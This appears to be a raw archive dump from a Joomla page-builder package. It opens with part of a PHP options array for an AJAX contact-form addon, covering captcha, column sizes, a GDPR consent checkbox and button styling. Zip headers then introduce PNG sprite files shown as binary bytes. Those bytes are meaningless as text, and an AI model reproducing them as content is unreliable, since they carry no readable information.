                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SHOW_CAPTCHA'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SHOW_CAPTCHA_DESC'),
                        'values' => array(
                            '0' => 'No',
                            '1' => 'Yes'
                        ),
                        'std' => '1'
                    ),
                    'captcha_type' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_CAPTCHA_TYPE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_CAPTCHA_TYPE_DESC'),
                        'values' => array(
                            'default' => JText::_('COM_SPPAGEBUILDER_GLOBAL_CAPTCHA_TYPE_DEFAULT'),
                            'gcaptcha' => JText::_('COM_SPPAGEBUILDER_GLOBAL_CAPTCHA_TYPE_GCHAPTCHA'),
                            'igcaptcha' => JText::_('COM_SPPAGEBUILDER_GLOBAL_CAPTCHA_TYPE_INVISIBLE_GCHAPTCHA'),
                        ),
                        'std' => 'default',
                        'depends' => array('formcaptcha' => '1'),
                    ),
                    'captcha_question' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_QUESTION'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_QUESTION_DESC'),
                        'std' => '3 + 4 = ?',
                        'depends' => array(
                            array('formcaptcha', '=', '1'),
                            array('captcha_type', '=', 'default'),
                        ),
                    ),
                    'captcha_input_col' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_INPUT_COL_SIZE'),
                        'values' => array(
                            '3' => '3',
                            '4' => '4',
                            '5' => '5',
                            '6' => '6',
                            '7' => '7',
                            '8' => '8',
                            '9' => '9',
                            '12' => '12',
                        ),
                        'std' => '12',
                        'depends' => array(
                            array('formcaptcha', '=', '1'),
                            array('captcha_type', '=', 'default'),
                        ),
                    ),
                    'captcha_answer' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_ANSWER'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_ANSWER_DESC'),
                        'std' => '7',
                        'depends' => array(
                            array('formcaptcha', '=', '1'),
                            array('captcha_type', '=', 'default'),
                        ),
                    ),
                    //Column
                    'col_separator'=>array(
                        'type'=>'separator',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_COLUMN_OPTION'),
                    ),
                    'name_input_col' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME_INPUT_COL_SIZE'),
                        'values' => array(
                            '3' => '3',
                            '4' => '4',
                            '5' => '5',
                            '6' => '6',
                            '7' => '7',
                            '8' => '8',
                            '9' => '9',
                            '12' => '12',
                        ),
                        'std' => '12'
                    ),
                    'email_input_col' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL_INPUT_COL_SIZE'),
                        'values' => array(
                            '3' => '3',
                            '4' => '4',
                            '5' => '5',
                            '6' => '6',
                            '7' => '7',
                            '8' => '8',
                            '9' => '9',
                            '12' => '12',
                        ),
                        'std' => '12'
                    ),
                    'subject_input_col' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT_INPUT_COL_SIZE'),
                        'values' => array(
                            '3' => '3',
                            '4' => '4',
                            '5' => '5',
                            '6' => '6',
                            '7' => '7',
                            '8' => '8',
                            '9' => '9',
                            '12' => '12',
                        ),
                        'std' => '12'
                    ),
                    'phone_input_col' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_PHONE_INPUT_COL_SIZE'),
                        'values' => array(
                            '3' => '3',
                            '4' => '4',
                            '5' => '5',
                            '6' => '6',
                            '7' => '7',
                            '8' => '8',
                            '9' => '9',
                            '12' => '12',
                        ),
                        'std' => '12',
                        'depends' => array('show_phone' => '1')
                    ),
                    'message_input_col' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE_INPUT_COL_SIZE'),
                        'values' => array(
                            '3' => '3',
                            '4' => '4',
                            '5' => '5',
                            '6' => '6',
                            '7' => '7',
                            '8' => '8',
                            '9' => '9',
                            '12' => '12',
                        ),
                        'std' => '12'
                    ),
                    'show_label' => array(
                        'type' => 'checkbox',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SHOW_LABEL'),
                        'std' => 0,
                    ),
                    'show_checkbox' => array(
                        'type' => 'checkbox',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SHOW_CHECKBOX'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SHOW_CHECKBOX_DESC'),
                        'std' => 1,
                    ),
                    'checkbox_title' => array(
                        'type' => 'textarea',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CHECKBOX_TITLE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CHECKBOX_TITLE_DESC'),
                        'std' => 'I agree with the <a href="#">Terms of Use</a> and <a href="#">Privacy Policy</a> and I declare that I have read the information that is required in accordance with <a href="http://eur-lex.europa.eu/legal-content/EN/TXT/?uri=uriserv:OJ.L_.2016.119.01.0001.01.ENG&amp;toc=OJ:L:2016:119:TOC" target="_blank">Article 13 of GDPR.</a>',
                        'depends' => array('show_checkbox' => 1)
                    ),
                    // Button
                    'btn_separator'=>array(
                        'type'=>'separator',
                        'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_BUTTON_OPTIONS'),
                    ),
                    'use_custom_button' => array(
                        'type' => 'checkbox',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_USE_BUTTON'),
                        'std' => 0,
                    ),
                    'button_text' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_TEXT_DESC'),
                        'std' => 'Send Message',
                        'depends' => array('use_custom_button' => 1)
                    ),
                    'button_font_family' => array(
                        'type' => 'fonts',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_FONT_FAMILY'),
                        'selector' => array(
                            'type' => 'font',
                            'font' => '{{ VALUE }}',
                            'css' => '.sppb-btn { font-family: {{ VALUE }}; }'
                        ),
                        'depends' => array('use_custom_button' => 1)
                    ),
                    'button_font_style' => array(
                        'type' => 'fontstyle',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_FONT_STYLE'),
                        'depends' => array('use_custom_button' => 1)
                    ),
                    'button_letterspace' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_LETTER_SPACING'),
                        'values' => array(
                            '0' => 'Default',
                            '1px' => '1px',
                            '2px' => '2px',
                            '3px' => '3px',
                            '4px' => '4px',
                            '5px' => '5px',
                            '6px' => '6px',
                            '7px' => '7px',
                            '8px' => '8px',
                            '9px' => '9px',
                            '10px' => '10px'
                        ),
                        'std' => '0',
                        'depends' => array('use_custom_button' => 1)
                    ),
					'button_type'=>array(
						'type'=>'select',
						'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE_DESC'),
						'values'=>array(
							'default'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DEFAULT'),
							'flex'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_FLEX'),
							'dark'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DARK'),
							'light'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LIGHT'),
							'primary'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_PRIMARY'),
							'secondary' => JText::_('COM_SPPAGEBUILDER_GLOBAL_SECONDARY'),
							'success'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_SUCCESS'),
							'info'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INFO'),
							'warning'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_WARNING'),
							'danger'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_DANGER'),
							'link'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LINK'),
							'custom'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CUSTOM'),
						),
						'std'=>'default',
						'depends'=>array('use_custom_button' => 1)
					),
                    'fontsize' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_FONT_SIZE'),
                        'std' => array('md' => 16),
                        'responsive' => true,
                        'max' => 400,
                        'depends' => array(
                            array('button_type', '=', 'custom'),
                        )
                    ),
                    //Link Button Style
                    'link_button_status' => array(
                        'type' => 'buttons',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_STYLE'),
                        'std' => 'normal',
                        'values' => array(
                            array(
                                'label' => 'Normal',
                                'value' => 'normal'
                            ),
                            array(
                                'label' => 'Hover',
                                'value' => 'hover'
                            ),
                        ),
                        'tabs' => true,
                        'depends' => array(
                            array('button_type', '=', 'link'),
                        )
                    ),
                    'link_button_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_COLOR'),
                        'std' => '',
                        'depends' => array(
                            array('button_type', '=', 'link'),
                            array('link_button_status', '=', 'normal'),
                        )
                    ),
                    'link_button_border_width' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_WIDTH'),
                        'max'=> 30,
                        'std' => '',
                        'depends' => array(
                            array('button_type', '=', 'link'),
                            array('link_button_status', '=', 'normal'),
                        )
                    ),
                    'link_border_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_COLOR'),
                        'std' => '',
                        'depends' => array(
                            array('button_type', '=', 'link'),
                            array('link_button_status', '=', 'normal'),
                        )
                    ),
                    'link_button_padding_bottom' => array(
                        'type' => 'slider',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_PADDING_BOTTOM'),
                        'max'=>100,
                        'std' => '',
                        'depends' => array(
                            array('button_type', '=', 'link'),
                            array('link_button_status', '=', 'normal'),
                        )
                    ),
                    //Link Hover
                    'link_button_hover_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_COLOR_HOVER'),
                        'std' => '',
                        'depends' => array(
                            array('button_type', '=', 'link'),
                            array('link_button_status', '=', 'hover'),
                        )
                    ),
                    'link_button_border_hover_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_COLOR_HOVER'),
                        'std' => '',
                        'depends' => array(
                            array('button_type', '=', 'link'),
                            array('link_button_status', '=', 'hover'),
                        )
                    ),
                    'button_padding' => array(
                        'type' => 'padding',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_PADDING_DESC'),
                        'std' => '',
                        'depends' => array(
                            array('button_type', '=', 'custom'),
                        ),
                        'responsive' => true
                    ),
                    'button_appearance' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_DESC'),
                        'values' => array(
                            '' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_FLAT'),
                            'gradient' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_GRADIENT'),
                            'outline' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_OUTLINE'),
                            '3d' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_APPEARANCE_3D'),
                        ),
                        'std' => '',
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '!=', 'link'),
                        )
                    ),
                    'button_status' => array(
                        'type' => 'buttons',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_ENABLE_BACKGROUND_OPTIONS'),
                        'std' => 'normal',
                        'values' => array(
                            array(
                                'label' => 'Normal',
                                'value' => 'normal'
                            ),
                            array(
                                'label' => 'Hover',
                                'value' => 'hover'
                            ),
                        ),
                        'tabs' => true,
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '=', 'custom'),
                            array('button_type', '!=', 'link'),
                        )
                    ),
                    'button_background_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_DESC'),
                        'std' => '#444444',
                        'depends' => array(
                            array('button_appearance', '!=', 'gradient'),
                            array('use_custom_button', '=', 1),
                            array('button_type', '=', 'custom'),
                            array('button_status', '=', 'normal'),
                            array('button_type', '!=', 'link'),
                        ),
                    ),
                    'button_background_gradient' => array(
                        'type' => 'gradient',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
                        'std' => array(
                            "color" => "#B4EC51",
                            "color2" => "#429321",
                            "deg" => "45",
                            "type" => "linear"
                        ),
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_appearance', '=', 'gradient'),
                            array('button_type', '=', 'custom'),
                            array('button_status', '=', 'normal'),
                            array('button_type', '!=', 'link'),
                        )
                    ),
                    'button_color' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_DESC'),
                        'std' => '#fff',
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '=', 'custom'),
                            array('button_status', '=', 'normal'),
                            array('button_type', '!=', 'link'),
                        ),
                    ),
                    'button_background_color_hover' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BACKGROUND_COLOR_HOVER_DESC'),
                        'std' => '#222',
                        'depends' => array(
                            array('button_appearance', '!=', 'gradient'),
                            array('use_custom_button', '=', 1),
                            array('button_type', '=', 'custom'),
                            array('button_status', '=', 'hover'),
                            array('button_type', '!=', 'link'),
                        ),
                    ),
                    'button_background_gradient_hover' => array(
                        'type' => 'gradient',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_GRADIENT'),
                        'std' => array(
                            "color" => "#429321",
                            "color2" => "#B4EC51",
                            "deg" => "45",
                            "type" => "linear"
                        ),
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_appearance', '=', 'gradient'),
                            array('button_type', '=', 'custom'),
                            array('button_status', '=', 'hover'),
                            array('button_type', '!=', 'link'),
                        )
                    ),
                    'button_color_hover' => array(
                        'type' => 'color',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_COLOR_HOVER_DESC'),
                        'std' => '#fff',
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '=', 'custom'),
                            array('button_status', '=', 'hover'),
                            array('button_type', '!=', 'link'),
                        ),
                    ),
                    'button_size' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DESC'),
                        'values' => array(
                            '' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_DEFAULT'),
                            'lg' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_LARGE'),
                            'xlg' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_XLARGE'),
                            'sm' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_SMALL'),
                            'xs' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SIZE_EXTRA_SAMLL'),
                        ),
                        'depends' => array('use_custom_button' => 1)
                    ),
                    'button_shape' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_DESC'),
                        'values' => array(
                            'rounded' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUNDED'),
                            'square' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_SQUARE'),
                            'round' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_SHAPE_ROUND'),
                        ),
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '!=', 'link'),
                        )
                    ),
                    'button_block' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_BLOCK_DESC'),
                        'values' => array(
                            '' => JText::_('JNO'),
                            'sppb-btn-block' => JText::_('JYES'),
                        ),
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '!=', 'link'),
                        )
                    ),
					'button_peicon'=>array( // Pixeden Icons
						'type'=>'select', 
						'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME'),
						'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC'),
						'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '!=', 'link'),
                        ),
						'values'=> $peicon_list
					),
                    'button_icon' => array(
                        'type' => 'icon',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_DESC'),
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '!=', 'link'),
                        )
                    ),
                    'button_icon_margin' => array(
                        'type' => 'margin',
                        'title' => JText::_('COM_SPPAGEBUILDER_TAB_ICON_MARGIN'),
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '!=', 'link'),
                        ),
                        'std'=>''
                    ),
                    'button_icon_position' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_ICON_POSITION'),
                        'values' => array(
                            'left' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
                            'right' => JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
                        ),
                        'depends' => array(
                            array('use_custom_button', '=', 1),
                            array('button_type', '!=', 'link'),
                        )
                    ),
                    'button_position' => array(
                        'type' => 'select',
                        'title' => JText::_('COM_SPPAGEBUILDER_GLOBAL_BUTTON_POSITION'),
                        'values' => array(
                            'sppb-text-left' => JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
                            'sppb-text-center' => JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
                            'sppb-text-right' => JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
                        ),
                        'std' => 'sppb-text-left',
                    ),
                    'class' => array(
                        'type' => 'text',
                        'title' => JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
                        'desc' => JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
                        'std' => ''
                    ),
                ),
            ),
        )
);
PK!��N�Qflex/sppagebuilder/addons/prettyphoto_modal/images/prettyPhoto/default/sprite.pngnu&1i��PNG


IHDR��B���tEXtSoftwareAdobe ImageReadyq�e<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068118BF2F6B511368090" xmpMM:DocumentID="xmp.did:275503303E8511E08E6F9312EF314E02" xmpMM:InstanceID="xmp.iid:24283CC43E8311E08E6F9312EF314E02" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:03801174072068118BF2F6B511368090" stRef:documentID="xmp.did:01801174072068118BF2F6B511368090"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�GIJIDATx��]pE���Wc	��0 Ȋ`I�2�z7�E��
��K|k|�R���|\ETJ���
p�,�^$��Hx$��DH$��ϝ̙�3'��93鯪�$3�s�������Ӟ��"f�����QQQc��çz<�:t5}^���TJ�J�{���x��!(((0%��+�
7�`K��=��ߣ�gϞ��ԩӒ�������;]v�e,22R*�A�󬱱����BYP�^.//k������-��o߾��V�}��5;0b�Ϟ={�R笻��+����
F�Ej��18�?щ��լ����ܹsw&''��i��_�*�nJζ��K�.>2Q9RdЕ�oP�0�(�,��/u�c�h5������z��H�n��ݻSB���L���)��z�ڀ�.�xϮ]���ٳ�+111R'*(�����aj{���m"_��ѣG�D�����8��*�ӡp�f�\֛��J%hk��e��s�λ��߻w��<A��b���:��/��A��u�m����V
A2�0��q?�8qbXZZZ�޵�5Q'R��6�&��(��
��]WW�Μ9�v����f��4o߾�2�(f�d�馛4�߹sg@�s��X�m^װr����7H�Vwot����Ğ䓗����	�NM���L�諯��!��С�t�,��7��������z��ȰT&R���!+�<��Г�6j�(Ͻ��;�L�� h[7�a0��6o�<H�ӧO���:�L����9\�kQu��2i�s�֭-�umV�^^E@�Fd������,��Ȍϖ�K���]���ݻw�O3���Z�A]�����^`Ǐo�LIIIa6�c��6|�ڵ�i^}Eź�cN�t�RF����_~�����+��ɓ�u�Gb�>VK@)t>�\ >ע����fdB���ٓO>��|�MI���'�U��bhz4��S���o�����_�3�<#=t٤��^{��:u�eee�֕��!k֬�1j'c4�ob�j������^z��8�.�z 320��֧�~�eggKA�?��d(�Y��4�ǖ!�F�/F��㏳��{�ѵ��g����O>��P���~�8����J��!�q�#s�Y��l����СC�h���r�5*��W&�l ..�]�x�m۶���g_�����!��<H0�KL�>�]{�f���<��x�F8�~�ػ�+��l�2ƣ�|���4���-�<{hR�'}�+�~���죏>�F�M�{��B
y6�Gm�Ȥu/$��
6��?��M�6M7��!��<�WX�%K�����K
�Ty��#\z�h�����
�'8iii~��?D��4�C�#Q��@�
��h�j٤z��S32�}/�b�dҕG��{���in#yl�,R�O_�p��EL��Z���˒��(ڰ.�____�q���G��r`�`;vL�G�ѵTwB}ܬLZ@ x���#GJ�ǃ5+��<j���O�||��(�'�����ڃ�Ν3�4���{N2op3g�d�}���p^�u6g�Ce�����~P�i�SG��̙3�\���A�/}衇�
��h�{��̌Ljt�ؑ%''�[o�U���o�^�!��<Z
���*���Bx����vTVV6E�y6��>�y��K��ٳgѩ�͟?��J�Ɵ�9Woچ���
�u
�����ɌLJ�5j[�p���(F�td2�2@�ĭ�Iy�D�Wȴ�Q�B8=̛7O꬇~X�	��l�~L+��	��|Y�f�������]^^���0�pK�㨃�������<X�m�ĉ�<x`Ɗ��d(d�,zr�c%Ny]^��&��F��ܹ�n����.�h��8��c�i�#�y����{��<AQQ�c�~A�ҭf�N%�Q�����"��	@�a��0$��#�U�X	��@iT\\\r�-��I�v�V��6�9΁�SEE��b�E,��v��QMV��\�X��E��e��~ �KJJf.Z��r�c2��,�)�	�,������g*9W]u�%E �lJJJ:L��JZ�)bk�1TUUA�+7oޜN�^�a��m���?ѧO�|zhדɍ�u�=��X�FJ���ڵk�tZ���C����$���"E��J>��Lڸq��>���y�7_@�QtKSw�С�L\�`A�,���ݸq#|4�_�lٲ���I�����a��4z�!?�ק�zj�|�z�����DzZ&�&�;��X��⵾m	y=�<*�a��ٴi�tb������)�<=p���駟�C�>�4���,������&M
�c̽"��S����t^�z�r=��X&�[��oz���_\`�"L��1!B�hL�}�ݷ<++���wiz�M2��.��a�CKa�/_�ߟ�+��ɑ����ԋ���"��$wT�|�َ�D�����ߨxȺ��j�7���Af�#kqE��))))ؙB>60r	0�|�7��H�`:E�E�M��_4��6�6�Me�;R��5�),�XCY,�n�9��zd�I�;vl�m��vklll*;qTh4u��$��Suuu_�4m뫯��?�Y++�� k��2�Z&�T��dE���"\&��E	W�8n�.�J��)�@�X���5xM��<��"����{��d�ɴ�ij��E[��TEc�5�>j�����r4��C�aC�AeC���`C;6F&�FE��
��A�����B6��"�9����k�����aP����l%hk��e�ޕ��W�l߾�4����L	�4..�Sǎ7dgg�K8�d:v�X�z��+,B0��V!�lhG*B���V��`���G`*�&L`�L�ս��������k@y��a���
=��"�P&��g�e����˗Kt3�*..f			�R���eJJJ�S&k;�s�#0s(�b�q�s999lРA�5(�����64�g �`��q
=t�P)�����L�+�Y�0�裏J��̯��6�en��L���I*?�O܄�L�+��9���{��%�3V������Jt7,�@vnѢE���j>��9�	���Z���ɖY��9�U@i�z;�nD�
�����b[n�ɤ7���"շY&[��� p�p{��wK�Pt�]w��eCkq�������������Z��`�d�"(��F˹a	�#��ߖ�Z��걡�����-w*2Y�J�V�<y�b:f"��{L���=b�/���=t�Ж��L���!���9|�u�IdWLŐL)[�{A��b`N��c�lh�`�
�F�^�"2Y�f�Ø[#8��G`��N��Ȑ~
�x=��-��ħ��#��M� �-�ES�a>s�o%p�s�=�%Ћ����-�fd�����J	%d�v�1���L�O�+��߿ۊ+
�����$%��:�9��?��8to���Se�A.�
�^�v���x����#G�,��9�b�p%Y����!E{����-[���]�ٙ�7�I(��Lyyy�w�q�;f
`�bƕ����$�Kx����j҃sxƪU����h�\��亅)2��>===k���)..��5̬�LIII��C��-X�����
�T&�&7-L��蜕�u;M
ۂ9\gd
lX�j�L���^��*�
1�G��laC۴��V6�k(oÇ��
m�rvf�u�GR˙�A�>�X&R�ƺEt)oEEE#����ktt��|N�J_��h�F��>�\�pa��7�7d��:''�����`jO�7[歂�Ҕ7��|f;��	�L{��������0�0:�*���j�2n�v��̢[)o�7R���(_|��L��I��kd�`-x���U��S�J�\��N�|������ǍwP���#0zV&q`���;z(�ܹsun�(o��#z�R	�o������r�3	7��\���ax�`5a���Sn
�^т��T%�Hs�"���p�&�V�@y�J���'�xB���=̭�]z�K<Y���x���������z���ܚG0�(�3���B ��bP�PR��7�+V��lp���;M>�(o-P3�0"W,��!.�N����n���R��a��شD%�
��G@�����@s�"�ð���Y��#�<"�%�7�t(Ð!C$��j��Fz���e�2e
�����;�q�2pt+=̕���:���? Ł�F�����8�ʇ��O��.^�� �吷��0u�P��u�V�k�LyA�T�}���[)o�(�"�n�YZZ:�f
�E|�������t�Ν�͙33�P�Q��k��q�7��W~�Q�7�6P7P�,T�B��2�C���(((��h�?�5����аn�>
��"���(Іy�}�����*��>
x-��>
���f�DZhEO��ݟ�6�N/>yfbk���4�.nj`�7��n�:ͺ��D[<���B�ڇ�>M���1�����~��T���*�����v�5�QT��`�VL�&��:��Q�qA��C6,bMOO��)�r�ɣ�D;���r{5�5B�}TC�
���P/gS_��*��G�{��;H	�ʀv�Q%�Q
����F�}t�"�vp�}!�Z�����9�3fL�o�1���!w���(
�OUTT���\����l�Ms[S\�}��3f̈����~��%C	|/��5kV_3���>������ŋ�GFFv���.�n��p)�k@VQ�h��F�ڪU�|n0{�l�54~#�⧟~�6U�wCH�{�n�!�q˖-,11Q��E			R�	�ճ�=qi�t��� �
��q�G�������h#M\���@��G�<��Gl�ǕA/���N}Np����3�akq����,����x�:�	���( )��>
��7z��8q��>��K��;�����6�Z[����V��gE��
��4i��>
Eh���؎A�򖓓#qSSSMo�'�B������G��\�P2DAAAwA�mNJPXX�;@&�����yx߾}�`B(�$X,6K(	l�� �
\RA��ZA�0M�m�2���JE`*��F0���c�o%A��ҥ�l&�}mE�G��e„	^F4/��Ǎ�
@��6�|c5p�y�y���	�`�(
у
��(��`B�:��bPg����
Jҫ�	�G�u)	�]��k�v6Ä��P%	�*�
@�J��HH7���_��{[�=½hq#������8w��ff^9cP�X�F{"�:z�`D��p�A�zJ�',��Pj��:ӊ�H�ZdX5V���^I����šԞ�'O�F$X5VyL���^I�K�.���BM�X��'E�`KKK��,x�F�+��$XyV�^}<--��G���fI���(|/��@{�<�V=�h շ�K���4@A}��	l�]���-H�-��g��3r�}�� ���5��"��/����f�۶���*�إ�5 �S.[�F��$��+�#�999�RSS����P�J��A�#� ��Y@X/�%��*+�E�IEND�B`�PK!����Sflex/sppagebuilder/addons/prettyphoto_modal/images/prettyPhoto/default/sprite_y.pngnu&1i��PNG


